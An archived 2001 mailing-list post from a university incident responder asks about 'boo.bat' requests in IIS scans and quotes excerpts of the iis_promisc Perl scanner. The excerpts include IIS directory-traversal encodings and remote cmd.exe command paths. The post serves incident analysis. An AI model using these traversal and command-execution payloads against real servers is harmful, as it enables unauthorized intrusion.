Since the security focus page doesn't actually list the source, I'll quote the relevant parts below. For those of you who are curious (I was) someone found me the translation of MinhaNossaSenhoraDoPerpetuoSocorro. It means Our Lady of Perpetual Help, referring to Mary. Interesting invocation to hack under. -- Jordan Wiens UF Network Incident Response Team (352)392-2061 On Mon, 2 Jul 2001, Jordan K Wiens wrote: > Anyone seen an iis scan that attempts to access boo.bat among other > requests along with directory traversal attempts? I found the source of > the script on the web but no mention is made of what boo.bat is included > for. Anyone know what this is? > > http://www.securityfocus.com/tools/2060 > > -----------IIS_PROMISC EXCERPTS---------------- #!/usr/bin/perl # # iis_promisc v2.0 # # This is a perl script to test the infamous # Microsoft IIS holes: # # -*- Escaped Characters Decoding Bug # -*- Unicode Directory Transversal Bug # # * Support Proxy Server # * Over 20 tests will be made ( if found display the patch URL too :) # # Added to v2: # # -*- Executable File Parsing Bug check # -*- Over 40 bugs tested! # # * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ # The package libwww is found in many linux distributions # # by inodeat_private # greetz to #unsekure @ irc.brasnet.org # http://unsekure.com.br # # 05/2001 . . [SNIP] . $test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro"; $dir_command = "winnt/system32/cmd.exe?/c+dir"; $iis = "1"; my @dir=( # You can add more exec dirs here #"/somedir/", "/", ## wwwroot "/scripts/", "/msadc/", "/cgi-bin/", "/bin/", "/samples/", "/_vti_cnf/", "/_vti_bin/", "/adsamples/", "/iisadmpwd/", "/Rpc/", "/PBServer/"); my @string=( "..%255c..%255c..%255c..%255c..%255c..%255c", "..%c0%af../..%c0%af../..%c0%af../", "..%e0%80%af../..%e0%80%af../..%e0%80%af../", "boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C"); . . [SNIP] . And the rest is pretty straight forward. Nothing too tricky. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Jul 02 2001 - 21:43:29 PDT